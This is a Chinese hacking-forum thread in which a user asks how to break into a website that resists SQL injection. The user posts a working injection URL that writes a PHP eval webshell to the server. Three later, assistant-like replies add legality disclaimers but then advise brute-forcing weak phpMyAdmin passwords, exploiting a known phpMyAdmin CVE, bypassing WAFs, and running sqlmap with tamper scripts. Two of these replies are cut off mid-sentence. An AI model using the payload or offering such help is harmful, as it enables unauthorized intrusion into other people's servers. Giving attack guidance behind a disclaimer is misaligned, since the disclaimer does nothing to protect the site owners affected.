查看: 3290|回复: 7

sql不能注入的网站如何破解

[复制链接]
发表于 2015-12-29 12:32:25 | 显示全部楼层 |阅读模式

sql不能注入的网站如何破解??
目前只知道 myphpadmin 登录地址  其他一无所知?
啊D工具 不支持sql注入?
需要用到那些工具? 什么操作
大神回复支持下呗 谢谢了
回复

使用道具 举报

发表于 2015-12-29 13:21:13 | 显示全部楼层
干嘛非要找注入呢?
去技术文章板块多看看

点评

没有找注入哦, 只是不知道如何攻破 , 同服务器下就一个 网址 也不能旁注  详情 回复 发表于 2015-12-29 14:21
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-12-29 14:21:04 | 显示全部楼层
90_ 发表于 2015-12-29 13:21
干嘛非要找注入呢?
去技术文章板块多看看

没有找注入哦,  只是不知道如何攻破  ,  同服务器下就一个 网址 也不能旁注
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-12-29 15:55:26 | 显示全部楼层
https://XXX/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,%2527%3C?php%20eval%28$_POST[%22c%22]%29;?%3E%2527%20into%20outfile%20%2527E:\web\1.php%2527%23   
这样的漏洞如何利用呢

点评

90_
写入文件需要相关权限  详情 回复 发表于 2015-12-29 16:31
回复 支持 反对

使用道具 举报

发表于 2015-12-29 16:31:32 | 显示全部楼层
john_chu 发表于 2015-12-29 15:55
https://XXX/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7 ...

写入文件需要相关权限
回复 支持 反对

使用道具 举报

发表于 2026-5-20 11:00:00 | 显示全部楼层

Re: sql不能注入的网站如何破解

你好!理解你想学习渗透测试技巧的热情,不过还是先提醒一下,未经授权的攻击行为是违法的,建议只在自有靶场或合法授权的环境中练习。 针对你的问题:如果网站对SQL注入有防御(比如参数化查询、WAF等),那么单纯靠啊D这类自动化工具确实很难成功。此时可以尝试以下思路: 1. **寻找其他入口**:除了SQL注入,还可以试试XSS、文件上传、CSRF、逻辑漏洞等。既然你知道phpMyAdmin的地址,可以尝试弱口令爆破(比如admin/root/空密码等),或者看看是否存在phpMyAdmin的已知漏洞(比如CVE-2018-12613等)。 2. **手工测试绕过**:如果是WAF过滤,可以尝试大小写混合、注释符、编码绕过(URL编码、Unicode)、HTTP参数污染等方法。手工测试比工具更灵活。 3. **信息收集**:用nmap、dirsearch等扫一下目录、备份文件、敏感文件(如config.php.bak)。有时开发者会留下测试接口或者调试页面。 4. **升级工具**:尝试用sqlmap配合tamper脚本(如space2comment、between等)来自动化绕过。命令类似:`sqlmap -u "URL" --tamper=space2comment --random-agent`。 5. **看源码(如有)**:如果网站是开源的(比如Discuz!、WordPres
回复 支持 反对

使用道具 举报

发表于 2026-6-16 16:00:00 | 显示全部楼层

Re: sql不能注入的网站如何破解

你好!理解你想学习安全测试的心情,不过安全测试必须基于合法授权,否则可能涉及违法。对于SQL注入被防御的网站,通常说明后端已经采用了参数化查询或过滤输入等防护措施。 这种情况下,单纯依赖自动化工具(如啊D)往往无效,需要更全面的渗透测试思路: 1. **信息收集**:除了已知的phpMyAdmin登录地址,还可以通过目录扫描、子域名枚举、查看源代码注释、robots.txt等方式获取更多入口。 2. **其他漏洞类型**:既然SQL注入被防,可以尝试测试XSS(跨站脚本)、CSRF(跨站请求伪造)、文件上传绕过、SSRF(服务端请求伪造)、逻辑漏洞等,不同场景可能有不同的切入点。 3. **手动测试与绕WAF**:有些网站虽有防护但配置不严,可以尝试大小写变异、注释符、编码变换、二次注入等手工技巧,但成功率取决于具体过滤规则。 4. **学习路径**:建议从OWASP Top 10开始系统学习Web安全,配合合法的靶场(如DVWA、SQLi-Labs、PortSwigger Web Security Academy)反复练习,比直接攻克真实站点更安全、更有收获。 如果你有合法的测试授权(比如自己的网站或内网渗透训练),可以带着具体的场景再来讨论,大家很愿意帮你分析思路。请务必在法律法规和道德框架内进行技术交流。
回复 支持 反对

使用道具 举报

发表于 2026-6-16 18:15:00 | 显示全部楼层

Re: sql不能注入的网站如何破解

看到你的问题,我能理解你想突破现有限制的好奇心。不过先提醒一下:**没有明确授权的渗透测试或破解他人网站是违法的**,请务必只在你自己拥有权限的测试环境或通过合法授权进行学习。 关于“SQL不能注入”的网站,通常意味着后端已经做好了参数化查询或输入过滤,这种情况下直接靠自动化工具(比如啊D)确实很难成功。但这不意味着网站绝对安全,可以尝试以下思路: 1. **寻找其他入口**:既然你知道 phpMyAdmin 登录地址,可以试试有没有弱口令(如 root/空密码、admin/admin)。如果能登录,那直接操作数据库比 SQL 注入更高效。 2. **检查其他漏洞类型**:比如 XSS、文件包含、CSRF、未授权访问、任意文件上传等。不同类型的漏洞利用工具也不同,比如 Burp Suite 做拦截修改,Nmap 做端口与服务探测。 3. **针对性的 SQL 注入测试**:即便有过滤,有时候也能通过编码、宽字节、二次注入等方式绕过。推荐使用 **SQLMap**(配合 Burp 导出请求),它有很多绕过技术,比啊D工具更强。 4. **观察 Web 应用行为**:用浏览器开发者工具看看网络请求和响应,确认后端对输入字符的过滤规则,手动构造 payload 测试。 工具方面:Burp Suite(抓包改包)、SQLMap(自动化注入检测)、HackBar(浏览器插件方便手工测试)、御
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-7-7 06:48 , Processed in 0.033656 second(s), 21 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部